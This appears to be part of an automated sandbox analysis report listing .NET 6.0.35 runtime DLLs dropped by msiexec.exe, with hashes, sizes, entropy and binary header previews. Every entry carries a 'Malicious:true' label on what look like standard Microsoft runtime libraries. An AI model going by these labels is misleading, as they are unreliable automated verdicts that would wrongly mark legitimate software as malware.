                                                                                                                                                                                                                                                                                                                                  SHA-256:E5575C2CFB312E9239978A2D439802F4D8D55C776D10B763ECBE20D2057982E9
                                                                                                                                                                                                                                                                                                                                  SHA-512:43C774556594FBFCC437B1A02FB1C938624E6D379985731A41F78E3782ADA4D8C143D32886794A7ED865FC917378C427DF90144D364F9ECBB8ADDF18CD129FC6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D{B..........."!..0.............>+... ........@.. ....................................`..................................*..W....@...................)...`......4*..8............................................ ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ +......H........ ..d...................P ......................................Lz.F.E.8B.1.@'.....mL.6%"U?B._....s.2.../}}....A.../yt >'\7...8r...v7..]..q.3.P..O.(.....r..E..Z...!@.z.v.......:....j..BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3......................................].........U.@.....@...n.....`.............y...0.!...9.!.........T...................................u.............@...........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.ThreadPool.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.712802666065952
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ZJ92mRTaW/pBqWEFvWecX6HRN7NtFDR9z7WJFcHv:Zv8v0WNfl9zaFcP
                                                                                                                                                                                                                                                                                                                                  MD5:EC4FF753DA77ED8B2886F1E405A35DBB
                                                                                                                                                                                                                                                                                                                                  SHA1:5EFD154E9DB2D9F5428ED5C7E2CD2E7A6C284641
                                                                                                                                                                                                                                                                                                                                  SHA-256:AA213B5B4B02F04217B98064E0E6C8E67D4CF7297035578A8DEFF06044BC9427
                                                                                                                                                                                                                                                                                                                                  SHA-512:217DCD7F7BAD548BCDBFFAA24B41A56C9CE42BDBF6A08EB1726B58D3CAA0495D8492B3843EA19143D09B7B25B33AA245F45DBF88CC59CA476FBAF9736D977B40
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"!..0..............*... ........@.. ....................................`..................................)..O....@.................. )...`.......)..8............................................ ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........ ..D...................P ......................................~+xk.f..{...,....H...P$../$..U.x"..ve........{`.....[....=QS0...K.A........AX..,.2...L.......GM.....gdt...e..#.`..f...BSJB............v4.0.30319......`.......#~..d... ...#Strings............#GUID...........#Blob......................3......................................P.........7...........P...........{.............................6...........p.......................W.....d...................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Timer.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15648
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.818215198409436
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:bRif6GCuqMffMIMWsmCWbkX6HRN7g55f9R9zrJRu/NjB:bR9ufnsWk5X9z2/Nt
                                                                                                                                                                                                                                                                                                                                  MD5:DA63DF1047EC11E67E31B84DA75139F8
                                                                                                                                                                                                                                                                                                                                  SHA1:9806EB4FAE997FD0DBDC8DEEB08A1224B6824DEF
                                                                                                                                                                                                                                                                                                                                  SHA-256:FA32A8375FA17F7B2F2ED34B1ED45330A2506DAF0FAE769B9CBC956E36F38DE6
                                                                                                                                                                                                                                                                                                                                  SHA-512:A605F33DE535ADD828B51D636A1D93D642D5D6C998A9A41C527EB62C57C04C346938D86AFFA14A4ADF7B891B7CD3E8E859E7027BC056C8F40E10D3CAB5B348BF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y............"!..0..............)... ........@.. ....................................`.................................T)..W....@.................. )...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ...............................................F...d._6....?.woY"...(......r.y...."H!T.....k).%...z...L.a+J.kM...S...;...ew..89.....3Ar.K...^.j..j..'!/....b._BSJB............v4.0.30319......`.......#~..<.......#Strings............#GUID...(.......#Blob......................3......................................(........."...........;.y.........f.......C.................J...!.J.....J...[.J.....J.....J.....J...B.J...O.J...v.............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):80144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.549870749231894
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:5Tc5R35Dx0ibqDo9suGxd1JARH7AWl7iLzn:5A5R3YHDo9gxd12KWl7M7
                                                                                                                                                                                                                                                                                                                                  MD5:217C90BF12B38AEDA557263C7AF4A306
                                                                                                                                                                                                                                                                                                                                  SHA1:56390B1AC126C7BD229EC1B221E7E78BCD35B92F
                                                                                                                                                                                                                                                                                                                                  SHA-256:31F5BB9877E0777AC208A34CB63CF97E4146BF9DDBBB0B8CB451633E7C543F9E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E34AF975E3189846804F2716CDBCD6FFE8D06A6A1D41C9462DFF64DFB79642EE84C944A064E35AD94E9E65B10F0B33CF604928639586137F1F00551AEDD87D7B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....a..........." .........................................................0.......Y....`...@......@............... ..................................d....*..\........)... ..$.......T...........................................................h...H............text...K........................... ..`.data...............................@....reloc..$.... ......................@..B............................................0.......................T.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........l.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...H.....0.0.0.0.0.4.b.0...:.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...T.h.r.e.a.d.i.n.g.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...J.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...T.h.r.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.Local.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):351520
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.644714489495638
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:rEfCVr/c2WYI0De//sQMd2uAIgeUow53HIt:wf8r02WpMHenlK
                                                                                                                                                                                                                                                                                                                                  MD5:416F763F3F8A2F17177E2609FEEE284A
                                                                                                                                                                                                                                                                                                                                  SHA1:43B261CB27A461949CA6A9BC723696A6CB7A30BF
                                                                                                                                                                                                                                                                                                                                  SHA-256:C62C23429BEE731709EDA16E1986C9BD089B81989E82F9F61D532F815F8C732E
                                                                                                                                                                                                                                                                                                                                  SHA-512:A55B0B2B5196703127A0F36C00021064CCE170D428FD12EFFDA77B09D11932BBA3A92A9FBD8D3CD15F6088FEEF56A65D27E59EE87D4CED59318CF2F62C0CD849
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...y............." .........X...............................................P............`...@......@............... .......................................z...3...4.. )...@.......*..T...............................................................H............text...>........................... ..`.data....O.......P..................@....reloc.......@.......,..............@..B............................................0...........................L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...L.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...T.r.a.n.s.a.c.t.i.o.n.s...L.o.c.a.l...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...\.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.676422570015763
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:35uFRdU+WzGiWoYA6VFHRN7mhdcTR9z66Q1j:JuFRmqUFClmhmV9zQ
                                                                                                                                                                                                                                                                                                                                  MD5:CF735B049EDD9AECEA6929479D438AB9
                                                                                                                                                                                                                                                                                                                                  SHA1:FE6F3DF934C54DCB28C6C29CD82C42746503031A
                                                                                                                                                                                                                                                                                                                                  SHA-256:EE06ADA630D4799FA5F16A7185890CB660E43ACCF1D377CBA27A3E9C5F83F326
                                                                                                                                                                                                                                                                                                                                  SHA-512:A042CDB90B117777C05DD62E69979F9576682ACE8D8965D1502BACEC5539B36E62AF163EC84C2A1C64E8F55ACFF25E6154FD16C7D52313916080B90B98AD63CF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.............j/... ...@....... .............................. |....`................................../..O....@..x................)...`......8...T............................................ ............... ..H............text...p.... ...................... ..`.rsrc...x....@......................@..@.reloc.......`......................@..B................K/......H.......P ..h....................-......................................BSJB............v4.0.30319......l.......#~..d...4...#Strings............#US.........#GUID...........#Blob............T.........3....................................$...............f.O.....O...^.<...o.................H.....*.................+.......................r.....,...........D.$.....O.................6.....6.....6...).6...1.6...9.6...A.6...I.6...Q.6...Y.6...a.6...i.6...q.6...y.6.....6. ...6.....6...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15648
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.822499066467974
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:D2Cdc393WtyGWbjX6HRN7in9R9zrJRY0le5:D21JDrWS9zQ0l8
                                                                                                                                                                                                                                                                                                                                  MD5:A61FE4F1CF1323421CD72519E4526BC8
                                                                                                                                                                                                                                                                                                                                  SHA1:59A8697119DD4287022B2ED4C0513EA22F3BB29C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0D8D708352C3B96D1AA193FFBD6F764A701EBFC979C700190494134E0E54F7B3
                                                                                                                                                                                                                                                                                                                                  SHA-512:6A565BE87005BEF075C7C6F0B13953794D52B861B5D40A74D3CCCA9A7813DE18195234827A83A4D38BFDB1CA64A712EA41A87A7A2A30023F45F624022A3DD4E0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x............."!..0..............)... ........@.. ....................................`..................................)..K....@..h............... )...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc...h....@......................@..@.reloc.......`......................@..B.................)......H........ ..,...................P .........................................fSc.....3..PM@...P@...L^...+............p.....u[.h.@o`.s.....m..~..2...E...zM...$.tl.No...Da.R...|.......R2...I.........BSJB............v4.0.30319......`...@...#~..........#Strings............#GUID...........#Blob......................3......................................]...............%...................C.....s...Q.z.....z.....z.....z...4.z.....z.....z.....z.....z...........i.................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.HttpUtility.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):52896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.684498329756475
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:ZZcxU+oWt5y4JSLFUA5JDHyFuc97Qk7Y32QttzX/XHXJREYcP+uLFClNP69zB:ZZN/iDALyFFQk7Y32OJPX7cP9piNuzB
                                                                                                                                                                                                                                                                                                                                  MD5:732613D07CF169180B7874BF3CA02EA8
                                                                                                                                                                                                                                                                                                                                  SHA1:0554B11B5E3C4A61823E9D7F74F71B0EA4A6678E
                                                                                                                                                                                                                                                                                                                                  SHA-256:6192CFA1614ECA1B992CFBA155FF9EF3D32C3A7F642912BBB502F0001DE246B5
                                                                                                                                                                                                                                                                                                                                  SHA-512:B60315B4C309A29C9E174A81464F528309155744FC170FD229A65ABEABAA1E035E2AFA7857D30BFD1586A80A1E15ED6807068C41154A32E3CD09E76BBE9ED93D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." ......................................................................`...@......@............... ......................................\!...........(..........8...T...............................................................H............text.............................. ..`.data...&...........................@....reloc..............................@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...F.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...W.e.b...H.t.t.p.U.t.i.l.i.t.y.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...V.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.711582753143812
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:DEVND8hxWVwo9W7YA6VFHRN7gD2R9zza+t1fY:D+u+2FClsK9zZ1fY
                                                                                                                                                                                                                                                                                                                                  MD5:31AC4E4AAED9264FA20A5E21B3393F7E
                                                                                                                                                                                                                                                                                                                                  SHA1:52A0AC2D9D0A5C099F6B490A3CED86CD5D04A446
                                                                                                                                                                                                                                                                                                                                  SHA-256:12EC2E14354B9F25143D4A6FE3DF9ABE0EAC379918B85BD7532D10C30E30423F
                                                                                                                                                                                                                                                                                                                                  SHA-512:EB15E6A6F18E89A8D4094C01FBAAC5DDB837794AB598D7D4176F98B8B0E0F0581D60FBBA8C97F0373E9817C89F8193A3E0C57BA88EC69F88F8A929A09879690F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............z*... ...@....... ..............................wQ....`.................................%*..O....@..8................)...`......X)..T............................................ ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`......................@..B................Y*......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....0.......#US.4.......#GUID...D...D...#Blob............T.........3....................................................6.Y.....Y...X.F...y.......................$...........o.......................V.....l.................>.......Y.................@.....@.....@...).@...1.@...9.@...A.@...I.@...Q.@...Y.@...a.@...i.@...q.@...y.@.....@. ...@.....@...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Windows.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.684087527310445
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ClyaMtLx2vJWE2SW3W+WxNzx95jmHnhWgN7acWNCmyttuX01k9z3AOV8sQR:GyaMtF0JWE2SWmFX6HRN7nnSR9zdV8hR
                                                                                                                                                                                                                                                                                                                                  MD5:D4DC0B9D603E0AC51FA099E12261E82D
                                                                                                                                                                                                                                                                                                                                  SHA1:C9D7877F32BA92F1D63F35999A9270CFDFBA6FCC
                                                                                                                                                                                                                                                                                                                                  SHA-256:5798AB51F67A1731E67A8A356763CB5C02BDA618DD575AED51DC6272096BB218
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F2999E1522ECD1EA45FE0BD2C1484C4A3E11E91D7E728D1358E7F9A2FE3B1144302A2DACCFFB0F97185F80C6E7F54A959D550F806E154FFB9E7C0B408A4B95C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5E..........." ..0..............,... ...@....... ....................................`..................................+..O....@..X................)...`.......+..T............................................ ............... ..H............text...4.... ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B.................,......H.......P ..4....................*......................................BSJB............v4.0.30319......l...h...#~..........#Strings............#US.........#GUID.......@...#Blob............T.........3......................................................Q...&.Q.....>...q.......D.........m.....y.................P...................................4.............Q..... ...........8.....8.....8...).8...1.8...9.8...A.8...I.8...Q.8...Y.8...a.8...i.8...q.8...y.8.....8. ...8.....8...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Linq.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16672
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.667070680792912
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:BhMvUCh9W1Y4WOArWxNzx95jmHnhWgN7agWUmMfKUSIX01k9z3ARqK:AL9W1Y4WOAEX6HRN79mW2IR9zoH
                                                                                                                                                                                                                                                                                                                                  MD5:19645202783866DF23C6D8746CE1196A
                                                                                                                                                                                                                                                                                                                                  SHA1:6D8293BA6B41247BA090E3ACB3AD98F4267AF44C
                                                                                                                                                                                                                                                                                                                                  SHA-256:E7065641210FAB4636FCC3B117E4E15A584838E71A4D0B3835D6378C78937465
                                                                                                                                                                                                                                                                                                                                  SHA-512:00A5FC30B4DDE85306BDDC509FD539F4C7A17C2A032EF65F620697C158D0A11DF5F06CF0FD1A6886B88D8EF7EB53321CE18B9ADFC5B6EE248291C09BDA411EE9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W..........." ..0..............,... ...@....... ....................................`..................................,..O....@..X............... )...`.......+..T............................................ ............... ..H............text........ ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B.................,......H.......P ......................(+......................................BSJB............v4.0.30319......l...l...#~......<...#Strings............#US.........#GUID...(.......#Blob............T.........3..........................................f...........+.....+.........K.......;.....z...d.....p.................G...................................+.......).....+.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.ReaderWriter.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22176
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.352093179803691
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:P125qkxK67ex4FCRunW1wAWEYA6VFHRN7JtHNsAR9zqo:NKLmAWFCl3ts89zL
                                                                                                                                                                                                                                                                                                                                  MD5:FB77B8FA47F57C039EC3202C86752842
                                                                                                                                                                                                                                                                                                                                  SHA1:22138F3686EB4AE26D4B6212EC91B1441F918AE0
                                                                                                                                                                                                                                                                                                                                  SHA-256:0B8B80E022A7A6F46E61CC434658AFC00F72631E4303AC5FA2237DBA99925098
                                                                                                                                                                                                                                                                                                                                  SHA-512:9685C0BECDEB79531BD37A40A4C1F7FB230706AD88AD25F3A1E930D59408DA370D050707B47D4BEC72E8C4598C080C2E01E415E94DCC8E14ADA3F4ACD9E545D9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=............."!..0..$...........B... ........@.. ...............................J....`.................................LB..O....`...................(...........A..8............................................ ............... ..H............text...."... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............,..............@..B.................B......H........ ... ..................P ........................................Qm=........B.*.c.)J.......f.....V.GQ@.[....ZY~.<L.>..9..?...`.........s.}c.....x....ujz.As7...{......~l..q....j..F>....r.BSJB............v4.0.30319......`.......#~......8...#Strings............#GUID...(.......#Blob......................3............................................................G..... .......b.....i...f.....-.........................................[...............................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Serialization.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7385136944866995
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+rKxzzhLW7MfEqHWqWxNzx95jmHnhWgN7aoW3zAcZQZfKUSIX01k9z3ARq7fG7yu:+ezdLW7MfEqHW5X6HRN7l2IR9zoqG9
                                                                                                                                                                                                                                                                                                                                  MD5:618450D16A5E2A9E8892A0A08748115B
                                                                                                                                                                                                                                                                                                                                  SHA1:F282DDC839FEE8E157C8F9453B2C447CF2292E5A
                                                                                                                                                                                                                                                                                                                                  SHA-256:84537A54CCA9AA87F0246E71E75A77124C90B4602A979C111368848FD975B591
                                                                                                                                                                                                                                                                                                                                  SHA-512:8AB0AC9D1BC47D5378B70D38D8EC86B08EB1CC0FE9A1167BA3DC16CE49F1CEBE47D410A59A9F2A60F699773D0D745625C348744B3114300D03B6E0F507E77757
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{............" ..0..............-... ...@....... ..............................:^....`..................................-..O....@...................)...`.......,..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................,......................................BSJB............v4.0.30319......l...x...#~..........#Strings............#US.........#GUID...........#Blob............T.........3..........................................p.........$.F.....F...r.....|.......<...............*...........]...........0.....M.....D.................s.....D.....x.F.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XDocument.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.768329397272433
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:RaxphW/vdWXpWjA6Kr4PFHnhWgN7agWacdhHssDX01k9z3AGWaEj:yphW/vdWXYA6VFHRN78dFDR9z7WPj
                                                                                                                                                                                                                                                                                                                                  MD5:D0EB97936EF83C560D6C32F8A01DD0B4
                                                                                                                                                                                                                                                                                                                                  SHA1:689484E237A3C1BF34DCBD30349EF026D25EB9E6
                                                                                                                                                                                                                                                                                                                                  SHA-256:E9E7AB3E5CE5993C393E1628A9390C3C676661FADD15B8AF18DF8F37D4E7F0D6
                                                                                                                                                                                                                                                                                                                                  SHA-512:C395BB74991B8C3F8590CF339920CF283A5887C8330B41FCB4C2AA958F25970CD67D037CFC5A20B291E8F088EF2580BBCB9AC641AA97A2E4DC965D6B4805DAC6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
